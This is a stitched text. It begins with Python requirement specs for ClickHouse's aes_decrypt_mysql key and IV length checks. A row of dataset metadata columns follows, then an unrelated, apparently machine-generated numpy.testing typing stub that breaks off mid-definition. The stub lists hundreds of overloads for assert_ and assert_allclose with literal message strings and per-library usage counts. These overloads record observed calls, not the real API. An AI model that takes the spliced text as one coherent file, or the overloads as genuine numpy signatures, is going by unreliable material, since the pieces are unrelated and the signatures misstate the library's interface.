group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error when `mode` for the `aes_decrypt_mysql` function is set to `aes-128-cfb1` and `key` is less than 16 bytes\n'
'or if specified `iv` is less than 16 bytes.\n'
),
link=None
)
RQ_SRS008_AES_MySQL_Decrypt_Function_AES_192_CFB1_KeyAndInitializationVector_Length = Requirement(
name='RQ.SRS008.AES.MySQL.Decrypt.Function.AES-192-CFB1.KeyAndInitializationVector.Length',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error when `mode` for the `aes_decrypt_mysql` function is set to `aes-192-cfb1` and `key` is less than 24 bytes\n'
'or if specified `iv` is less than 16 bytes.\n'
),
link=None
)
RQ_SRS008_AES_MySQL_Decrypt_Function_AES_256_CFB1_KeyAndInitializationVector_Length = Requirement(
name='RQ.SRS008.AES.MySQL.Decrypt.Function.AES-256-CFB1.KeyAndInitializationVector.Length',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error when `mode` for the `aes_decrypt_mysql` function is set to `aes-256-cfb1` and `key` is less than 32 bytes\n'
'or if specified `iv` is less than 16 bytes.\n'
),
link=None
)
RQ_SRS008_AES_MySQL_Decrypt_Function_AES_128_CFB8_KeyAndInitializationVector_Length = Requirement(
name='RQ.SRS008.AES.MySQL.Decrypt.Function.AES-128-CFB8.KeyAndInitializationVector.Length',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error when `mode` for the `aes_decrypt_mysql` function is set to `aes-128-cfb8` and `key` is less than 16 bytes\n'
'and if specified `iv` is less than 16 bytes.\n'
),
link=None
)
RQ_SRS008_AES_MySQL_Decrypt_Function_AES_192_CFB8_KeyAndInitializationVector_Length = Requirement(
name='RQ.SRS008.AES.MySQL.Decrypt.Function.AES-192-CFB8.KeyAndInitializationVector.Length',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error when `mode` for the `aes_decrypt_mysql` function is set to `aes-192-cfb8` and `key` is less than 24 bytes\n'
'or if specified `iv` is less than 16 bytes.\n'
),
link=None
)
RQ_SRS008_AES_MySQL_Decrypt_Function_AES_256_CFB8_KeyAndInitializationVector_Length = Requirement(
name='RQ.SRS008.AES.MySQL.Decrypt.Function.AES-256-CFB8.KeyAndInitializationVector.Length',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error when `mode` for the `aes_decrypt_mysql` function is set to `aes-256-cfb8` and `key` is less than 32 bytes\n'
'or if specified `iv` is less than 16 bytes.\n'
),
link=None
)
RQ_SRS008_AES_MySQL_Decrypt_Function_AES_128_CFB128_KeyAndInitializationVector_Length = Requirement(
name='RQ.SRS008.AES.MySQL.Decrypt.Function.AES-128-CFB128.KeyAndInitializationVector.Length',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error when `mode` for the `aes_decrypt_mysql` function is set to `aes-128-cfb128` and `key` is less than 16 bytes\n'
'or if specified `iv` is less than 16 bytes.\n'
),
link=None
)
RQ_SRS008_AES_MySQL_Decrypt_Function_AES_192_CFB128_KeyAndInitializationVector_Length = Requirement(
name='RQ.SRS008.AES.MySQL.Decrypt.Function.AES-192-CFB128.KeyAndInitializationVector.Length',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error when `mode` for the `aes_decrypt_mysql` function is set to `aes-192-cfb128` and `key` is less than 24 bytes\n'
'or if specified `iv` is less than 16 bytes.\n'
),
link=None
)
RQ_SRS008_AES_MySQL_Decrypt_Function_AES_256_CFB128_KeyAndInitializationVector_Length = Requirement(
name='RQ.SRS008.AES.MySQL.Decrypt.Function.AES-256-CFB128.KeyAndInitializationVector.Length',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error when `mode` for the `aes_decrypt_mysql` function is set to `aes-256-cfb128` and `key` is less than 32 bytes\n'
'or if specified `iv` is less than 16 bytes.\n'
),
link=None
)
RQ_SRS008_AES_MySQL_Decrypt_Function_AES_128_OFB_KeyAndInitializationVector_Length = Requirement(
name='RQ.SRS008.AES.MySQL.Decrypt.Function.AES-128-OFB.KeyAndInitializationVector.Length',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error when `mode` for the `aes_decrypt_mysql` function is set to `aes-128-ofb` and `key` is less than 16 bytes\n'
'or if specified `iv` is less than 16 bytes.\n'
),
link=None
)
RQ_SRS008_AES_MySQL_Decrypt_Function_AES_192_OFB_KeyAndInitializationVector_Length = Requirement(
name='RQ.SRS008.AES.MySQL.Decrypt.Function.AES-192-OFB.KeyAndInitializationVector.Length',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error when `mode` for the `aes_decrypt_mysql` function is set to `aes-192-ofb` and `key` is less than 24 bytes\n'
'or if specified `iv` is less than 16 bytes.\n'
),
link=None
)
RQ_SRS008_AES_MySQL_Decrypt_Function_AES_256_OFB_KeyAndInitializationVector_Length = Requirement(
name='RQ.SRS008.AES.MySQL.Decrypt.Function.AES-256-OFB.KeyAndInitializationVector.Length',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error when `mode` for the `aes_decrypt_mysql` function is set to `aes-256-ofb` and `key` is less than 32 bytes\n'
'or if specified `iv` is less than 16 bytes.\n'
),
link=None
)
| 37.935862
| 159
| 0.645518
| 18,004
| 138,997
| 4.834037
| 0.014886
| 0.047431
| 0.065217
| 0.068182
| 0.986051
| 0.983765
| 0.98103
| 0.972838
| 0.960199
| 0.939873
| 0
| 0.046058
| 0.252883
| 138,997
| 3,663
| 160
| 37.946219
| 0.792021
| 0.001547
| 0
| 0.695
| 1
| 0.132647
| 0.4739
| 0.128516
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.000588
| 0.000294
| 0
| 0.000294
| 0.000588
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
242baa1c852fa003a4ec2749346b30bb0c072fa9
| 376,563
|
py
|
Python
|
data/typing/numpy.testing._private.utils.py
|
vfdev-5/python-record-api
|
006faf0bba9cd4cb55fbacc13d2bbda365f5bf0b
|
[
"MIT"
] | null | null | null |
data/typing/numpy.testing._private.utils.py
|
vfdev-5/python-record-api
|
006faf0bba9cd4cb55fbacc13d2bbda365f5bf0b
|
[
"MIT"
] | null | null | null |
data/typing/numpy.testing._private.utils.py
|
vfdev-5/python-record-api
|
006faf0bba9cd4cb55fbacc13d2bbda365f5bf0b
|
[
"MIT"
] | null | null | null |
from typing import *
@overload
def assert_(val: numpy.bool_):
"""
usage.scipy: 503
usage.skimage: 58
"""
...
@overload
def assert_(val: numpy.bool_, msg: str):
"""
usage.scipy: 40
usage.skimage: 2
"""
...
@overload
def assert_(val: bool):
"""
usage.scipy: 901
usage.skimage: 18
"""
...
@overload
def assert_(val: bool, msg: Literal["1.5.1"]):
"""
usage.scipy: 1
"""
...
@overload
def assert_(val: bool, msg: Literal[""]):
"""
usage.scipy: 15
"""
...
@overload
def assert_(val: bool, msg: str):
"""
usage.scipy: 84
"""
...
@overload
def assert_(
val: bool,
msg: Tuple[scipy.integrate.tests.test_integrate.SimpleOscillator, Literal["adams"]],
):
"""
usage.scipy: 3
"""
...
@overload
def assert_(
val: bool,
msg: Tuple[scipy.integrate.tests.test_integrate.SimpleOscillator, Literal["bdf"]],
):
"""
usage.scipy: 3
"""
...
@overload
def assert_(
val: bool,
msg: Tuple[scipy.integrate.tests.test_integrate.CoupledDecay, Literal["bdf"]],
):
"""
usage.scipy: 3
"""
...
@overload
def assert_(
val: bool,
msg: Tuple[scipy.integrate.tests.test_integrate.ComplexExp, Literal["adams"]],
):
"""
usage.scipy: 3
"""
...
@overload
def assert_(
val: bool,
msg: Tuple[scipy.integrate.tests.test_integrate.ComplexExp, Literal["bdf"]],
):
"""
usage.scipy: 3
"""
...
@overload
def assert_(
val: bool, msg: Tuple[scipy.integrate.tests.test_integrate.Pi, Literal["adams"]]
):
"""
usage.scipy: 3
"""
...
@overload
def assert_(
val: bool, msg: Tuple[scipy.integrate.tests.test_integrate.Pi, Literal["bdf"]]
):
"""
usage.scipy: 3
"""
...
@overload
def assert_(
val: bool,
msg: Tuple[scipy.integrate.tests.test_integrate.CoupledDecay, Literal["adams"]],
):
"""
usage.scipy: 3
"""
...
@overload
def assert_(val: numpy.bool_, msg: Tuple[int, int, numpy.float64, float]):
"""
usage.scipy: 1
"""
...
@overload
def assert_(val: numpy.bool_, msg: Tuple[int, int]):
"""
usage.scipy: 3
"""
...
@overload
def assert_(val: numpy.bool_, msg: numpy.float64):
"""
usage.scipy: 2
"""
...
@overload
def assert_(val: bool, msg: Literal["1877"]):
"""
usage.scipy: 1
"""
...
@overload
def assert_(val: bool, msg: Literal["abs-diff: 0.053538"]):
"""
usage.scipy: 1
"""
...
@overload
def assert_(val: bool, msg: Literal["abs-diff: 0.105586"]):
"""
usage.scipy: 2
"""
...
@overload
def assert_(val: bool, msg: Literal["abs-diff: 0.105546"]):
"""
usage.scipy: 2
"""
...
@overload
def assert_(val: bool, msg: Literal["abs-diff: 0.103046"]):
"""
usage.scipy: 1
"""
...
@overload
def assert_(val: bool, msg: Literal["abs-diff: 0.066854"]):
"""
usage.scipy: 2
"""
...
@overload
def assert_(val: bool, msg: Literal["abs-diff: 0.058661"]):
"""
usage.scipy: 1
"""
...
@overload
def assert_(val: bool, msg: Literal["abs-diff: 0.181948"]):
"""
usage.scipy: 1
"""
...
@overload
def assert_(val: bool, msg: Literal["abs-diff: 0.087866"]):
"""
usage.scipy: 1
"""
...
@overload
def assert_(val: bool, msg: Literal["abs-diff: 0.111942"]):
"""
usage.scipy: 1
"""
...
@overload
def assert_(val: bool, msg: Literal["abs-diff: 0.128603"]):
"""
usage.scipy: 1
"""
...
@overload
def assert_(val: bool, msg: Literal["abs-diff: 0.188998"]):
"""
usage.scipy: 1
"""
...
@overload
def assert_(val: numpy.ndarray):
"""
usage.scipy: 9
"""
...
@overload
def assert_(val: int):
"""
usage.scipy: 2
"""
...
@overload
def assert_(val: bool, msg: numpy.dtype):
"""
usage.scipy: 7
"""
...
@overload
def assert_(val: bool, msg: Literal["expected rank 0"]):
"""
usage.scipy: 1
"""
...
@overload
def assert_(val: bool, msg: Literal["Spin 0 failed"]):
"""
usage.scipy: 2
"""
...
@overload
def assert_(val: bool, msg: Literal["Spin 1 failed"]):
"""
usage.scipy: 2
"""
...
@overload
def assert_(val: bool, msg: Literal["Spin 2 failed"]):
"""
usage.scipy: 2
"""
...
@overload
def assert_(val: bool, msg: Literal["Spin 3 failed"]):
"""
usage.scipy: 2
"""
...
@overload
def assert_(val: bool, msg: Literal["Spin 4 failed"]):
"""
usage.scipy: 2
"""
...
@overload
def assert_(val: bool, msg: Literal["Spin 5 failed"]):
"""
usage.scipy: 2
"""
...
@overload
def assert_(val: bool, msg: Literal["Spin 6 failed"]):
"""
usage.scipy: 2
"""
...
@overload
def assert_(val: bool, msg: Literal["Spin 7 failed"]):
"""
usage.scipy: 2
"""
...
@overload
def assert_(val: bool, msg: Literal["Spin 8 failed"]):
"""
usage.scipy: 2
"""
...
@overload
def assert_(val: bool, msg: Literal["Spin 9 failed"]):
"""
usage.scipy: 2
"""
...
@overload
def assert_(val: bool, msg: Literal["0"]):
"""
usage.scipy: 3
"""
...
@overload
def assert_(val: Tuple[bool, Literal["There are NaN roots"]]):
"""
usage.scipy: 1
"""
...
@overload
def assert_(val: numpy.bool_, msg: scipy.optimize.optimize.OptimizeResult):
"""
usage.scipy: 3
"""
...
@overload
def assert_(val: bool, msg: scipy.optimize.optimize.OptimizeResult):
"""
usage.scipy: 2
"""
...
@overload
def assert_(val: bool, msg: Tuple[Tuple[float, float, float], Callable]):
"""
usage.scipy: 1
"""
...
@overload
def assert_(val: bool, msg: Tuple[List[int], Callable]):
"""
usage.scipy: 1
"""
...
@overload
def assert_(val: bool, msg: Tuple[Tuple[float, float, float, float], Callable]):
"""
usage.scipy: 1
"""
...
@overload
def assert_(val: bool, msg: Tuple[List[int], Callable]):
"""
usage.scipy: 1
"""
...
@overload
def assert_(val: bool, msg: int):
"""
usage.scipy: 27
"""
...
@overload
def assert_(val: bool, msg: bytes):
"""
usage.scipy: 4
"""
...
@overload
def assert_(val: bool, msg: Literal["Number of Taps"]):
"""
usage.scipy: 1
"""
...
@overload
def assert_(val: numpy.bool_, msg: Literal["Zero at zero and pi"]):
"""
usage.scipy: 1
"""
...
@overload
def assert_(val: numpy.bool_, msg: Tuple[numpy.float64, int, int]):
"""
usage.scipy: 1
"""
...
@overload
def assert_(val: numpy.bool_, msg: Literal["k=None"]):
"""
usage.scipy: 2
"""
...
@overload
def assert_(val: numpy.bool_, msg: Literal["k=1"]):
"""
usage.scipy: 2
"""
...
@overload
def assert_(val: numpy.bool_, msg: Literal["k=2"]):
"""
usage.scipy: 2
"""
...
@overload
def assert_(val: numpy.bool_, msg: Literal["k=40"]):
"""
usage.scipy: 2
"""
...
@overload
def assert_(val: numpy.bool_, msg: Literal["k=42"]):
"""
usage.scipy: 2
"""
...
@overload
def assert_(val: bool, msg: float):
"""
usage.scipy: 2
"""
...
@overload
def assert_(val: bool, msg: Literal["[2]"]):
"""
usage.scipy: 1
"""
...
@overload
def assert_(val: bool, msg: Literal["[3]"]):
"""
usage.scipy: 1
"""
...
@overload
def assert_(val: scipy.sparse.csr.csr_matrix):
"""
usage.scipy: 1
"""
...
@overload
def assert_(val: scipy.sparse.csc.csc_matrix):
"""
usage.scipy: 1
"""
...
@overload
def assert_(val: scipy.sparse.lil.lil_matrix):
"""
usage.scipy: 1
"""
...
@overload
def assert_(val: scipy.sparse.coo.coo_matrix):
"""
usage.scipy: 1
"""
...
@overload
def assert_(val: scipy.sparse.dia.dia_matrix):
"""
usage.scipy: 1
"""
...
@overload
def assert_(val: scipy.sparse.bsr.bsr_matrix):
"""
usage.scipy: 1
"""
...
@overload
def assert_(val: numpy.bool_, msg: numpy.int64):
"""
usage.scipy: 1
"""
...
@overload
def assert_(val: numpy.bool_, msg: Tuple[float, int]):
"""
usage.scipy: 2
"""
...
@overload
def assert_(val: numpy.bool_, msg: Tuple[int, float]):
"""
usage.scipy: 1
"""
...
@overload
def assert_(
val: numpy.bool_,
msg: Tuple[numpy.float64, numpy.float64, numpy.float64, numpy.float64],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_(
val: bool, msg: Tuple[numpy.float64, numpy.float64, numpy.float64, numpy.float64]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_(val: bool, msg: Literal["ftest Entropy is nan"]):
"""
usage.scipy: 1
"""
...
@overload
def assert_(val: bool, msg: Literal["fppf private is nan"]):
"""
usage.scipy: 1
"""
...
@overload
def assert_(val: bool, msg: Literal["ttest Entropy is nan"]):
"""
usage.scipy: 1
"""
...
@overload
def assert_(val: bool, msg: Literal["tppf private is nan"]):
"""
usage.scipy: 1
"""
...
@overload
def assert_(val: bool, msg: Literal["<class 'int'>"]):
"""
usage.scipy: 1
"""
...
def assert_(val: object, msg: object = ...):
"""
usage.scipy: 1706
usage.skimage: 78
"""
...
@overload
def assert_allclose(actual: numpy.float64, desired: int, atol: float):
"""
usage.matplotlib: 4
usage.scipy: 50
usage.skimage: 1
usage.sklearn: 2
"""
...
@overload
def assert_allclose(actual: numpy.ndarray, desired: int, atol: float):
"""
usage.scipy: 68
usage.skimage: 15
usage.sklearn: 2
"""
...
@overload
def assert_allclose(actual: numpy.ndarray, desired: numpy.ndarray, rtol: float):
"""
usage.matplotlib: 3
usage.scipy: 298
usage.skimage: 11
usage.sklearn: 70
"""
...
@overload
def assert_allclose(actual: numpy.ndarray, desired: numpy.ndarray):
"""
usage.matplotlib: 22
usage.scipy: 871
usage.skimage: 57
usage.sklearn: 264
usage.xarray: 21
"""
...
@overload
def assert_allclose(actual: float, desired: float, atol: float):
"""
usage.scipy: 27
usage.skimage: 3
"""
...
@overload
def assert_allclose(actual: float, desired: numpy.float64, atol: float):
"""
usage.scipy: 1
usage.skimage: 3
"""
...
@overload
def assert_allclose(actual: numpy.ndarray, desired: List[float]):
"""
usage.matplotlib: 3
usage.scipy: 88
usage.skimage: 6
usage.sklearn: 6
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray, desired: numpy.ndarray, rtol: float, atol: int
):
"""
usage.scipy: 15
usage.skimage: 1
usage.sklearn: 2
"""
...
@overload
def assert_allclose(actual: numpy.ndarray, desired: int):
"""
usage.matplotlib: 2
usage.scipy: 16
usage.skimage: 22
usage.sklearn: 1
"""
...
@overload
def assert_allclose(actual: numpy.float64, desired: numpy.float64):
"""
usage.scipy: 102
usage.skimage: 2
usage.sklearn: 21
"""
...
@overload
def assert_allclose(actual: numpy.ndarray, desired: numpy.ndarray, atol: float):
"""
usage.matplotlib: 100
usage.scipy: 238
usage.skimage: 31
usage.sklearn: 27
"""
...
@overload
def assert_allclose(actual: numpy.int64, desired: int, atol: float):
"""
usage.skimage: 1
"""
...
@overload
def assert_allclose(actual: numpy.float64, desired: float, rtol: float):
"""
usage.scipy: 128
usage.skimage: 1
usage.sklearn: 7
"""
...
@overload
def assert_allclose(actual: numpy.ndarray, desired: Tuple[float, float]):
"""
usage.scipy: 3
usage.skimage: 1
"""
...
@overload
def assert_allclose(actual: numpy.float64, desired: int):
"""
usage.matplotlib: 1
usage.scipy: 20
usage.skimage: 1
usage.sklearn: 1
"""
...
@overload
def assert_allclose(actual: numpy.float64, desired: int, rtol: float, atol: float):
"""
usage.scipy: 2
usage.skimage: 1
"""
...
@overload
def assert_allclose(actual: numpy.ndarray, desired: List[numpy.float64], atol: float):
"""
usage.scipy: 2
usage.skimage: 1
"""
...
@overload
def assert_allclose(actual: numpy.ndarray, desired: numpy.float64):
"""
usage.scipy: 37
usage.sklearn: 1
usage.xarray: 3
"""
...
@overload
def assert_allclose(
actual: pandas.core.indexes.range.RangeIndex,
desired: xarray.core.dataarray.DataArray,
):
"""
usage.xarray: 7
"""
...
@overload
def assert_allclose(actual: numpy.float64, desired: float):
"""
usage.scipy: 111
usage.sklearn: 5
usage.xarray: 3
"""
...
@overload
def assert_allclose(actual: numpy.ndarray, desired: float):
"""
usage.scipy: 75
usage.sklearn: 2
usage.xarray: 1
"""
...
@overload
def assert_allclose(actual: object, desired: object):
"""
usage.xarray: 1
"""
...
@overload
def assert_allclose(actual: numpy.int64, desired: numpy.int64):
"""
usage.sklearn: 1
usage.xarray: 2
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray, desired: numpy.ndarray, rtol: float, atol: float
):
"""
usage.scipy: 211
usage.sklearn: 15
"""
...
@overload
def assert_allclose(actual: numpy.float64, desired: float, atol: float):
"""
usage.matplotlib: 1
usage.scipy: 67
usage.sklearn: 3
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray, desired: List[float], rtol: float, atol: float
):
"""
usage.scipy: 16
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray, desired: numpy.ndarray, rtol: float, atol: numpy.float128
):
"""
usage.scipy: 4
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray, desired: numpy.ndarray, rtol: float, atol: numpy.float64
):
"""
usage.scipy: 292
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray, desired: numpy.ndarray, rtol: int, atol: float
):
"""
usage.scipy: 15
usage.sklearn: 3
"""
...
@overload
def assert_allclose(actual: numpy.float64, desired: float, rtol: int, atol: float):
"""
usage.scipy: 20
usage.sklearn: 1
"""
...
@overload
def assert_allclose(actual: numpy.float64, desired: int, rtol: int, atol: float):
"""
usage.scipy: 3
"""
...
@overload
def assert_allclose(
actual: numpy.float64, desired: numpy.float64, rtol: int, atol: float
):
"""
usage.scipy: 3
usage.sklearn: 2
"""
...
@overload
def assert_allclose(actual: float, desired: float, rtol: int, atol: float):
"""
usage.scipy: 19
"""
...
@overload
def assert_allclose(actual: numpy.ndarray, desired: List[int], rtol: float):
"""
usage.scipy: 24
usage.sklearn: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray, desired: numpy.ndarray, err_msg: Literal["sol1 != sol2"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
atol: float,
err_msg: Literal["sol1 != sol3"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray, desired: numpy.ndarray, err_msg: Literal["sol3 != sol4"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
rtol: float,
err_msg: Literal["sol1 != sol1ty"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(actual: float, desired: float):
"""
usage.scipy: 14
usage.sklearn: 3
"""
...
@overload
def assert_allclose(actual: float, desired: numpy.float64, rtol: int, atol: float):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(actual: numpy.float64, desired: float, rtol: float, atol: int):
"""
usage.scipy: 13
"""
...
@overload
def assert_allclose(
actual: numpy.float64, desired: numpy.float64, rtol: float, atol: int
):
"""
usage.scipy: 4
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
rtol: float,
atol: float,
err_msg: Literal["der = 0 k = 1"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
rtol: float,
atol: float,
err_msg: Literal["der = 1 k = 1"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
rtol: float,
atol: float,
err_msg: Literal["der = 0 k = 2"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
rtol: float,
atol: float,
err_msg: Literal["der = 1 k = 2"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
rtol: float,
atol: float,
err_msg: Literal["der = 2 k = 2"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
rtol: float,
atol: float,
err_msg: Literal["der = 0 k = 3"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
rtol: float,
atol: float,
err_msg: Literal["der = 1 k = 3"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
rtol: float,
atol: float,
err_msg: Literal["der = 2 k = 3"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
rtol: float,
atol: float,
err_msg: Literal["der = 3 k = 3"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
rtol: float,
atol: float,
err_msg: Literal["der = 0 k = 4"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
rtol: float,
atol: float,
err_msg: Literal["der = 1 k = 4"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
rtol: float,
atol: float,
err_msg: Literal["der = 2 k = 4"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
rtol: float,
atol: float,
err_msg: Literal["der = 3 k = 4"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
rtol: float,
atol: float,
err_msg: Literal["der = 4 k = 4"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
rtol: float,
atol: float,
err_msg: Literal["der = 0 k = 5"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
rtol: float,
atol: float,
err_msg: Literal["der = 1 k = 5"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
rtol: float,
atol: float,
err_msg: Literal["der = 2 k = 5"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
rtol: float,
atol: float,
err_msg: Literal["der = 3 k = 5"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
rtol: float,
atol: float,
err_msg: Literal["der = 4 k = 5"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
rtol: float,
atol: float,
err_msg: Literal["der = 5 k = 5"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: List[numpy.ndarray], desired: numpy.ndarray, rtol: float, atol: float
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: List[List[numpy.ndarray]], desired: numpy.ndarray, rtol: float, atol: float
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(actual: List[numpy.ndarray], desired: numpy.ndarray, atol: float):
"""
usage.scipy: 3
"""
...
@overload
def assert_allclose(actual: float, desired: numpy.ndarray, atol: float):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(actual: numpy.ndarray, desired: float, atol: float):
"""
usage.scipy: 30
"""
...
@overload
def assert_allclose(actual: numpy.ndarray, desired: float, rtol: float, atol: float):
"""
usage.scipy: 4
"""
...
@overload
def assert_allclose(
actual: List[numpy.ndarray], desired: List[float], rtol: float, atol: float
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(actual: List[numpy.ndarray], desired: List[Union[int, float]]):
"""
usage.scipy: 2
"""
...
@overload
def assert_allclose(actual: List[numpy.ndarray], desired: List[float]):
"""
usage.scipy: 5
"""
...
@overload
def assert_allclose(actual: List[numpy.ndarray], desired: List[float], atol: float):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: List[numpy.ndarray], desired: List[complex], rtol: float, atol: float
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(actual: numpy.ndarray, desired: int, rtol: float, atol: float):
"""
usage.scipy: 8
"""
...
@overload
def assert_allclose(actual: float, desired: numpy.float64):
"""
usage.scipy: 3
usage.sklearn: 1
"""
...
@overload
def assert_allclose(actual: float, desired: int, atol: float):
"""
usage.scipy: 9
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
rtol: float,
atol: float,
err_msg: Literal["item 0"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
rtol: float,
atol: float,
err_msg: Literal["item 1"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
rtol: float,
atol: float,
err_msg: Literal["item 2"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
rtol: float,
atol: float,
err_msg: Literal["item 3"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
rtol: float,
atol: float,
err_msg: Literal["Function 0"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
rtol: float,
atol: float,
err_msg: str,
):
"""
usage.scipy: 7
usage.sklearn: 5
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
rtol: float,
atol: float,
err_msg: Literal["Function 1"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
rtol: float,
atol: float,
err_msg: Literal["Function 2"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
rtol: float,
atol: float,
err_msg: Literal["Function 3"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
rtol: int,
atol: float,
err_msg: Literal["Function 0"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
rtol: int,
atol: float,
err_msg: Literal["Function 1"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
rtol: int,
atol: float,
err_msg: Literal["Function 2"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
rtol: int,
atol: float,
err_msg: Literal["Function 3"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
rtol: float,
atol: float,
err_msg: Literal["Function 4"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray, desired: numpy.ndarray, atol: float, err_msg: str
):
"""
usage.scipy: 6
usage.sklearn: 7
"""
...
@overload
def assert_allclose(actual: numpy.float64, desired: numpy.float64, rtol: float):
"""
usage.scipy: 62
usage.sklearn: 10
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray, desired: numpy.ndarray, err_msg: Literal["dx=0"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
